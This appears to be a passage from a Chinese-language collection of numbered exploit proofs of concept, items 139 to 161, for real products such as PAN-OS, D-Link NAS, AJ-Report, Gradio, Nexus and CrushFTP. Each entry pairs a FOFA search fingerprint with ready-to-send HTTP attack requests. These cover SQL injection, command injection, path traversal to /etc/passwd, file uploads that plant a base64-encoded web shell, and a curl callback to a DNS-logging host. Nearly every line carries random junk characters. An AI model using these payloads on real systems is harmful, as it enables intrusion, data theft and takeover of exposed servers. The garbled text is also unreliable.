FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"* g! ]$ \4 D% C5 c, ~
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
: u% M* H$ D# B. h& A9 v' MHost: x.x.x.x5 @4 }. t$ Y7 T+ R2 |* x3 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 m+ q! }4 t: L9 l5 O" ?0 `' O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 o4 m( u. r9 i7 V5 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& K9 g7 n4 i7 T) @' C
Accept-Encoding: gzip, deflate, br
& C6 q5 f- Y8 C+ c* |7 wConnection: close
U" p" i. J8 @Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
?7 H; j0 I9 ^. v" z# KUpgrade-Insecure-Requests: 1
4 D- ~/ Y! y2 _4 X3 ?7 h) T
% W9 [ y" O$ @" Q! z# B7 u! v1 C/ n/ V. ]6 N' P
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
3 d h/ Q/ d7 L( _5 M4 L oCVE-2024-2566. t- u& v' L- y2 j$ A" {" u
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- D& ^ e6 Y8 V/ W* bGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
! d n9 t# v$ P" m7 A$ bHost: x.x.x.x/ ~, |; a3 M2 K3 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! G; _2 c: ]- ], y+ g# r- b8 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ V @& k9 V4 V8 T8 y$ i% V9 V" R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | B4 u c1 |& L2 {3 Y
Accept-Encoding: gzip, deflate, br
" L9 f; k" g3 @, VConnection: close& M/ p' W* |, b; W L2 d
Cookie: authcode=h8g9) j3 s5 Q) d5 q3 s" H2 n
Upgrade-Insecure-Requests: 1
2 H! k/ l. n( ~- \' o
7 X7 H/ n6 ?3 x8 p0 u. H& I4 K
% n6 [# \# D! T141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入# `1 t6 L7 a3 C9 ^& @3 y4 ~
FOFA:body="指挥调度管理平台"
8 X$ ]& s& Q" J% T4 qPOST /app/ext/ajax_users.php HTTP/1.1( |8 Z/ W1 G5 d6 X. o2 `* K
Host: your-ip7 @. V* l" W8 K Z/ M
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info3 m( s' P$ T8 i" U( z8 [( @% A/ `
Content-Type: application/x-www-form-urlencoded
; b/ [& s2 a) l5 v1 P, B0 B1 D9 `# S5 S4 }
2 x. w4 E0 i$ D: A! ~5 i0 `dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -6 Q; z( y0 q9 q- v9 h( ` Y( b) d
+ `7 O6 q5 {+ G, V, P6 U: h) X
0 K4 e* g6 C M5 G X142. CMSV6车辆监控平台系统中存在弱密码+ X: E4 F) `1 ?/ }* U: ~
CVE-2024-29666. K! j$ V8 D0 O/ O F8 x, c
FOFA:body="/808gps/" a: p( j: |, a% e
admin/admin
- D3 g! t1 D2 `. P9 l9 K) D5 K143. Netis WF2780 v2.1.40144 远程命令执行% Z, r2 Q0 d, a) J2 W/ |/ ^
CVE-2024-25850
t, t. u% m+ O5 w( r' O& cFOFA:title='AP setup' && header='netis'
$ b, o+ r2 R1 W% x G' u) N# R# l2 HPAYLOAD
3 ~ [ p7 Y- K, X; S: x' k
$ f1 p0 ^6 V7 ~4 X1 S144. D-Link nas_sharing.cgi 命令注入
. X+ O8 d' U! ?7 xFOFA:app="D_Link-DNS-ShareCenter"
- I; q8 a D3 ]- bsystem参数用于传要执行的命令. r+ @4 r2 S B& ?1 H4 F0 C
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
. s. X$ o9 y+ c+ vHost: x.x.x.x
% S: X5 O6 v! C4 b5 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" X& a8 `9 [4 o: G, |8 J3 a8 ~
Connection: close
1 `" C8 D1 l1 SAccept: */*
) f# K6 @, s% v5 CAccept-Language: en
) b( E+ `5 s9 m0 G+ `4 O7 |# xAccept-Encoding: gzip
: }9 e+ R: D1 k% M: e `, M4 q
2 m3 C( W/ t4 h+ E, n: S9 R3 G. j! f, `& `4 J% ~- [
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入0 H1 h! t# k. j! T
CVE-2024-3400
2 F- J0 }; B3 ]) h/ a' KFOFA:icon_hash="-631559155"
5 V7 T/ a- B1 p6 qGET /global-protect/login.esp HTTP/1.18 a7 Q; W6 ~: y( T
Host: 192.168.30.112:1005
; t s6 n5 K$ ?7 W4 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: h2 x+ l9 I& j$ W, U
Connection: close
) v6 j: K+ I4 ]2 m: l8 zCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;% K. Z+ ]/ t2 S' c
Accept-Encoding: gzip5 Q1 \" _' }! T# L- D: T. o
: X: @: `+ U$ i; x2 U
; r- e9 b( O4 \) c. q% M. T146. MajorDoMo thumb.php 未授权远程代码执行
6 Y+ w2 ^6 t% c2 L0 UCNVD-2024-02175
3 ]! H% U1 X: V" z- V1 XFOFA:app="MajordomoSL"
; J8 t2 L1 r# E2 mGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1$ j* w1 w4 W( U" E ]
Host: x.x.x.x# _/ [/ t7 s5 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
" A. x8 P0 ~. p7 }, ?5 ZAccept-Charset: utf-80 f' e6 S6 v" ~8 [7 B1 ]
Accept-Encoding: gzip, deflate
T0 L" b9 @0 J w% F0 BConnection: close- P; w I9 Z! m, \! U% G
( F* W* R4 C: A9 A$ t. F
$ c( F! E% I0 V; ^: r3 F
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历* d6 Y5 e! c* Y/ z5 e
CVE-2024-32399
/ V: j% F' e Y9 }# ]FOFA:body="RaidenMAILD"
$ b, c" B3 Z L: tGET /webeditor/../../../windows/win.ini HTTP/1.15 s+ n5 h2 g! Q
Host: 127.0.0.1:81
" N: M# \! ^% o3 |0 y0 g' vCache-Control: max-age=0
% U7 F3 L- N4 V- |7 M1 g2 G% n3 ^Connection: close
7 X! j" t! _5 a6 l
+ _% Z7 B8 w! t; D
9 g# b, ]" z1 v( Y148. CrushFTP 认证绕过模板注入/ q1 ]; ?9 a5 O6 ~7 w
CVE-2024-4040
) k& m7 h( ^; ]FOFA:body="CrushFTP". e( ?8 w7 |/ I4 X( g8 `8 S* Z
PAYLOAD" l; Z$ t: U" p
( A! w+ T* `. t$ ?0 d149. AJ-Report开源数据大屏存在远程命令执行- P8 Z( y2 Q' C: A
FOFA:title="AJ-Report"
6 v3 s6 {% ]( I& _
2 a8 j# x A3 b. m7 s: BPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
* I4 O, |" F$ D" R6 ?Host: x.x.x.x9 N. T4 s- S; c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 D$ f# w: \' fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 X" R2 w. n' d' L
Accept-Encoding: gzip, deflate, br
+ h+ I# D5 c& r6 P1 y2 LAccept-Language: zh-CN,zh;q=0.94 K% h w9 m. L& O) k8 w6 x! L. i3 e
Content-Type: application/json;charset=UTF-8
/ B8 n, {1 w: C5 ~: eConnection: close
, c f7 t& X0 o$ o+ G& B' b
9 K, S2 w% K) ?6 D1 W6 Z{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}3 c% S0 M5 k% h+ T( r3 `
f6 d7 n* h. [4 |150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 ]9 h: [# E$ w5 \& d. iFOFA:title="AJ-Report"
! D/ L! P2 l% Y( TPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
7 A$ i1 }% V a+ b [/ f0 I1 A0 {Host: x.x.x.x
4 r6 W* R9 f5 y6 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ P1 u; ^. a, |& LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) L! q7 p& S8 ~" {2 u$ g) O
Accept-Encoding: gzip, deflate, br
7 k1 e7 S; y5 P# c5 {- o2 WAccept-Language: zh-CN,zh;q=0.9 b4 \( v" k& C A
Content-Type: application/json;charset=UTF-8
0 A1 `! ]0 z# K: y9 ?6 ^Connection: close
, w) V0 J" ~. yContent-Length: 339
G3 h. S3 @# g# \( [4 K% C4 I' d1 u/ J( O
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}9 }/ F X d8 n6 j4 m) V
/ O% x1 H3 s% ^2 B
V7 k2 l) M4 N4 _4 B151. AJ-Report 1.4.1 pageList sql注入# Y9 V0 t4 z2 z: E v
FOFA:title="AJ-Report"
. E! i* C @2 u/ d4 ?7 P3 C0 ~GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' y: W! ~# Y0 Y( p8 {$ U3 |. s- yHost: x.x.x.x
6 ^1 t4 M& y) L+ ?5 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: X4 V! D, x" R0 F1 r$ v* }
Connection: close0 e$ m, ?; X5 j
Accept-Encoding: gzip
# }7 i. `7 Q% L3 `. y( f1 A6 E, C% k" L; b
" D5 a) Q) u+ U: }) ^152. Progress Kemp LoadMaster 远程命令执行
& ?% b, Z, }4 O: z. r5 sCVE-2024-1212$ r; z- U$ W0 w5 ]5 D' R
LoadMaster <= 7.2.59.2 (GA)
% |+ i5 h5 y7 F6 B* i0 Z8 s, yLoadMaster<=7.2.54.8 (LTSF)
- v/ m! p& y$ U p& v: q, [- n* nLoadMaster <= 7.2.48.10 (LTS)
) e/ p) v2 s2 S0 kFOFA:body="LoadMaster"
7 w& J. T* y9 A" Y5 C$ KJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
4 y% e% G) [ K9 @GET /access/set?param=enableapi&value=1 HTTP/1.17 V% W) |# m u5 Z! ?4 c2 f
Host: x.x.x.x+ Q- q( F9 m7 J$ n$ T: v' {" Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1& ?* b8 y+ l& P! u( N6 h. M6 O( D
Connection: close) y' R4 x' Q2 N5 S5 g$ N7 [- k6 @
Accept: */*
0 \' R- z. T7 q! o$ r, |Accept-Language: en
3 Z2 W/ N# F2 F% b+ UAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
& y ]+ N; |) w G- T, Z% a0 zAccept-Encoding: gzip
, _/ Q- W' V! \* _8 Z4 A& c5 ]$ w! h+ R- U) c' Q; @
- Y2 s6 s1 G% J* ?/ D153. gradio任意文件读取8 J+ j- ^ ~) L" ?) a# K9 I5 H/ @
CVE-2024-1561FOFA:body="__gradio_mode__"
* ]( i8 T) Z: C9 j$ C第一步,请求/config文件获取componets的id
v, b# K3 C5 K( |( s4 mhttp://x.x.x.x/config* W- L, Z3 G4 N. y% D# i
) f" f/ J/ B+ T+ C. G# M2 @" n
; v$ R7 q2 D) x; U+ \
第二步,将/etc/passwd的内容写入到一个临时文件" A* L# T$ Z& M0 w9 Q* v
POST /component_server HTTP/1.16 E9 M' R+ |0 E N/ H; M7 }0 p: ~) P
Host: x.x.x.x
3 |( m. q" y/ ^3 h7 w% p9 [; zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3" E" N$ h5 O% y( a
Connection: close
. \# q1 F+ F4 FContent-Length: 115
! l( B" M' v- s3 PContent-Type: application/json! j/ G$ E, S" l9 M% b% A% x: q U
Accept-Encoding: gzip
) m# ?$ K% n6 z7 [- ^, g9 S$ D3 }8 o1 _3 ]$ x U3 _
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
% V+ @+ o( K) \8 u0 W4 k& K; W F4 e4 m: \) I1 Q' ?
9 C; a- q1 }0 H
第三步访问
6 ]8 u# a( I/ b8 F# m9 b; r" Ehttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
% |9 X, O* v( N( X* X9 Y/ f0 M- _
, a$ u* @: a9 J$ C154. 天维尔消防救援作战调度平台 SQL注入
* n. g6 {# h: Z) jCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
: S& @! Y# W, g' l# TPOST /twms-service-mfs/mfsNotice/page HTTP/1.15 ~, P7 m' E% s8 ?: ^. e, g8 v9 K: [
Host: x.x.x.x# w+ M: l* L; O( c$ e. }# u
Content-Length: 106" u+ M4 r! W7 g! N$ \" |
Cache-Control: max-age=0& J' m, i* l. q; @7 M
Upgrade-Insecure-Requests: 1
( W4 V* t1 E, X. o* Z; R0 h7 c9 kOrigin: http://x.x.x.x
9 h" H% T$ @/ z& m# w) m7 JContent-Type: application/json
1 | Q9 Z P# W9 n DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 @# j. ^0 q( ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 j& Z* X- X: w; r, {) s
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
. D% N6 B# c- R4 eAccept-Encoding: gzip, deflate
/ O! j2 ?5 F3 \, w6 hAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
! b% q$ ?% @/ e0 Q; d& rConnection: close: ?- ^/ G' S6 D! ]4 Z8 V3 b) f
% I' r. f2 s( W3 L
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}* S s6 B1 i# ^7 ~$ m' f, N. E
8 u( r* A0 B1 _! a- b8 w) W. T! c
) M. \0 q( m& I- x9 @155. 六零导航页 file.php 任意文件上传
$ J; ?7 v, T3 ACVE-2024-34982: r$ n" ?; j I( B
FOFA:title=="上网导航 - LyLme Spage"
# p( y8 x l2 a- W- w, y. F. HPOST /include/file.php HTTP/1.1
7 [. A5 L. L* G' lHost: x.x.x.x$ g8 x) V$ n) k6 [! U$ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 `7 [8 K& N7 n4 u
Connection: close, L' N* x: I/ m9 D6 ~0 ^# s
Content-Length: 232
0 P u- o' K- ~: o, i; W( C, ?Accept: application/json, text/javascript, */*; q=0.01
) _. l; n0 _# C9 j9 F6 EAccept-Encoding: gzip, deflate, br
. }9 u4 o# P1 K! [* ?0 ^: uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; i$ l, B" }0 ^" U8 z1 t1 ^
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
: u; L0 |, r, ~. ~3 l5 i P; vX-Requested-With: XMLHttpRequest) F5 d3 m. D8 |, G3 }/ j2 {! I( b5 c
+ A6 f/ u% l+ U-----------------------------qttl7vemrsold314zg0f( C9 k7 C! r, u% i3 k" I4 V
Content-Disposition: form-data; name="file"; filename="test.php"! m+ y( Q- e8 M( I/ ]3 i. J) i8 B9 h
Content-Type: image/png
7 L, J) m3 o4 `( V `/ q8 @( P
<?php phpinfo();unlink(__FILE__);?>
% O- M3 V7 c8 M5 a R-----------------------------qttl7vemrsold314zg0f--
: u1 Q: g4 c. T$ `6 ]) K, u4 N" z5 A% b
6 X6 N3 v8 c# V# h/ w
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php6 ^) m( R+ e$ d1 h9 @; @9 q
5 R1 e$ g) M# [( N/ n* `$ Y$ S x
156. TBK DVR-4104/DVR-4216 操作系统命令注入 i" L$ _7 ]: Y& k
CVE-2024-3721
$ `' S9 Y8 D+ N& o0 y% xFOFA:"Location: /login.rsp"
6 d6 L) y& f7 V3 E·TBK DVR-4104
6 o( k, F# r0 ~; f# }·TBK DVR-42168 w7 {3 z; D& B# @* Y0 G
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
2 u9 s3 i2 k+ H+ _' g" q2 J ~9 z8 g+ K( Z
- g% L# R- [. Y$ x. [& V
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1! Q1 S6 X/ M0 @# A$ O8 r; U' g
Host: x.x.x.x& h7 y9 M. c7 f' j
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 e6 A& o. I& BConnection: close- T+ u# a. {5 |+ C& y+ V
Content-Length: 0
7 g9 C5 m" L% N7 X9 x, v# a2 UCookie: uid=1
: S- f( R2 W' `Accept-Encoding: gzip" q* k: ]" e) K3 H" n0 @- F3 a5 v
4 i0 g2 S) F8 Q# v
+ r! e& {6 Q$ L+ B: \8 N5 R4 p157. 美特CRM upload.jsp 任意文件上传8 h+ t. Q1 G# c
CNVD-2023-06971; i; |, V0 a9 D# J/ |0 J6 @
FOFA:body="/common/scripts/basic.js"8 O5 j- Y$ z# \2 z& J8 A2 z0 x
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
' E0 [; f2 S8 a! |0 nHost: x.x.x.x2 w4 p' t$ t- r- v$ X7 u3 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2 Y* y3 M* q7 y7 |3 e8 w2 ~Content-Length: 709
. l$ t! u* @& h. DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; C) U; A8 P% G7 T# W
Accept-Encoding: gzip, deflate( @1 }8 I3 S. h) z
Accept-Language: zh-CN,zh;q=0.99 F0 n- [4 Y& G) b
Cache-Control: max-age=0! l' G4 m3 m( u/ i+ K% z8 R8 [
Connection: close
: @ D* ^0 z1 c1 b- i" OContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
1 O) i6 e" F' {; eUpgrade-Insecure-Requests: 1
8 E" L, n- J) p, s- M6 d% K X! D) t$ L2 f& M
------WebKitFormBoundary1imovELzPsfzp5dN6 ]" o9 r$ v3 { p2 X) R
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
; P5 q9 d! W# @4 tContent-Type: application/octet-stream$ V; K& B1 @7 z- {/ @
1 w4 A& Z2 Q- v" F0 `+ enyhelxrutzwhrsvsrafb
' y1 ^3 l J! U3 [" f& j------WebKitFormBoundary1imovELzPsfzp5dN
: h b# T6 D) aContent-Disposition: form-data; name="key"
! A/ T$ k. p8 i/ c/ c4 C% i
& {. e6 r/ z8 j& }null
, m8 A+ o$ N, G1 i7 d5 P/ O------WebKitFormBoundary1imovELzPsfzp5dN5 R* L: ` Q6 a% D u4 h
Content-Disposition: form-data; name="form"
0 Z+ h) h; ]0 b4 ~
: @3 D7 e5 Z. X5 X/ jnull
1 x, t* u% B/ h/ `------WebKitFormBoundary1imovELzPsfzp5dN
- y$ m; i$ g/ i1 \Content-Disposition: form-data; name="field"
: I- H8 c' @% x/ Y: B i' a, C, v6 N) R2 z: D4 a
null
D* r# e& Y2 {------WebKitFormBoundary1imovELzPsfzp5dN3 g. ?* B0 S S
Content-Disposition: form-data; name="filetitile"
6 V, w" S8 `& x$ x/ C) @4 h! K4 N. e) l8 S+ _! e
null
@' D$ j( h) c! a% r------WebKitFormBoundary1imovELzPsfzp5dN3 a# u! G3 j. w! K) x7 F
Content-Disposition: form-data; name="filefolder"
& Q- n. x' B, ?0 ^: J3 Y# P4 u& I4 q" ^! g8 j$ c
null
- {2 i' ]1 \- F5 R& O------WebKitFormBoundary1imovELzPsfzp5dN--0 x; ?; q( v8 s4 G" |6 b- A# I
8 q9 t$ d3 ]+ G- \/ z& |8 U; {
0 V% a+ \) Z; T8 S4 s- o
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp# ?7 W3 t9 S+ c- u
) k$ ^# \* A8 A* U7 s
158. Mura-CMS-processAsyncObject存在SQL注入% ^# s) Q" W( Q2 g4 [4 @. F8 ]* @1 q b
CVE-2024-32640. m+ w8 y7 x3 R# r
FOFA:"Generator: Masa CMS"
' _" [4 N% A9 N* [POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& s9 ~* c2 L& ?Host: {{Hostname}}
v" ]4 W- G R) W7 A9 z5 @Content-Type: application/x-www-form-urlencoded. c7 w4 E7 K z% ` O! ?5 u
% y; P7 p& k9 k8 C0 W6 C. G
object=displayregion&contenthistid=x\'&previewid=1
1 ~4 @' A, u& f6 h. [1 A7 N% m# x4 _4 r8 ^9 Y2 _( h
& N5 H" g& i7 j* q& A+ U159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传0 @+ a2 c9 z: ^$ m/ E& n
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
! @- a" z! k; t8 o: U% iPOST /webservices/WebJobUpload.asmx HTTP/1.10 h: S8 O2 X( \
Host: x.x.x.x y8 \5 g8 Y! L( r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.363 Q. \' V6 M8 E
Content-Length: 1080
( \. `7 h, {/ f+ `0 UAccept-Encoding: gzip, deflate
6 g. b. C6 H% i$ ~" m, q3 yConnection: close
N0 N# y: E4 ^Content-Type: text/xml; charset=utf-8" m. k7 O( }" E1 ^1 N% P
Soapaction: "http://rainier/jobUpload"
' w1 [4 e, g6 o
! T( {1 V4 S; v5 {: }1 S<?xml version="1.0" encoding="utf-8"?>/ q3 f+ ~1 C n& i! D
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ ]" H+ s/ U n$ ?/ \* C5 b% n<soap:Body>
e% I) s% t. h% K$ P, o<jobUpload xmlns="http://rainier">
0 G- v9 D( J/ n2 k& v<vcode>1</vcode>
3 p+ T/ y, M8 W) o) }8 y7 }. L<subFolder></subFolder>
. Q4 g7 G9 ~- J& M1 L' G# [2 y<fileName>abcrce.asmx</fileName>
! ?$ M' k2 l0 W5 Y<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>$ E6 j) u; D, v0 c& B3 t
</jobUpload>
9 P+ _3 d0 E4 \# p</soap:Body>
3 c, p$ N* I8 V8 Y% s</soap:Envelope>
( W% m* C3 f, d
! t' J) l' R6 Z% e
4 q. a4 _" K9 g9 H/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
( o; {2 I6 {/ ~; ?5 `9 F, f
6 R# r( C# x7 R7 |" v( n
6 c3 a0 e0 D- m) g* N5 ?160. Sonatype Nexus Repository 3目录遍历与文件读取
) O* E( U% j. hCVE-2024-4956
" V) X8 |; G5 R7 g6 b, PFOFA:title="Nexus Repository Manager"
( V# A" {5 G% W/ j- K( IGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
( c% D3 a, f; X8 V' \4 SHost: x.x.x.x/ D# X! v$ _& B5 A( w( c
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
5 k# U/ U5 z, z2 q7 P: a3 ~Connection: close
" }; V8 q* q7 `7 x. P3 U, b/ GAccept: */*
9 U5 D+ d0 N3 A9 O5 z$ A' `1 F+ i0 KAccept-Language: en, a: ^2 w4 s% @" f8 e
Accept-Encoding: gzip
7 v* L" h1 O2 L1 a2 {0 a/ c& {4 r# Z4 t2 Q+ B, l" S
8 g) H' N4 H% Z8 E2 P
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
. a% v) X- T0 q3 w/ ^! CFOFA:body="/KT_Css/qd_defaul.css"9 [/ P; Y) m! k; o7 }; B9 O9 d
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密1 d1 O3 R2 @8 K6 c3 e+ U* ^" o; _
POST /Webservice.asmx HTTP/1.1# T5 L( J. P( F/ f
Host: x.x.x.x8 c1 Z0 s7 u# q2 {9 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.362 A; K- p0 p2 U& m+ x0 S) o
Connection: close
* Q6 [, e; `. w! a9 {Content-Length: 445
2 }6 ]- E' S9 t2 C* ]4 @9 b# g5 IContent-Type: text/xml
, m4 m! V$ U U$ o8 RAccept-Encoding: gzip: B5 n, s y |& x$ P4 S* y' ]
8 a+ F1 h R+ ?
<?xml version="1.0" encoding="utf-8"?>1 L3 r9 J, P$ g0 W& L6 x1 C t4 E2 T
<soap:Envelope xmlns:xsi="
# s0 x& |: t3 _% b2 D1 D# Mhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
0 d5 h' D x% Z. S% Hxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">% t+ k' u4 y4 {2 e1 d( H4 V
<soap:Body>% C" j4 _0 `# ^6 y' O
<UploadResume xmlns="http://tempuri.org/">, m# E# d% J8 E" V! C7 e+ i5 R
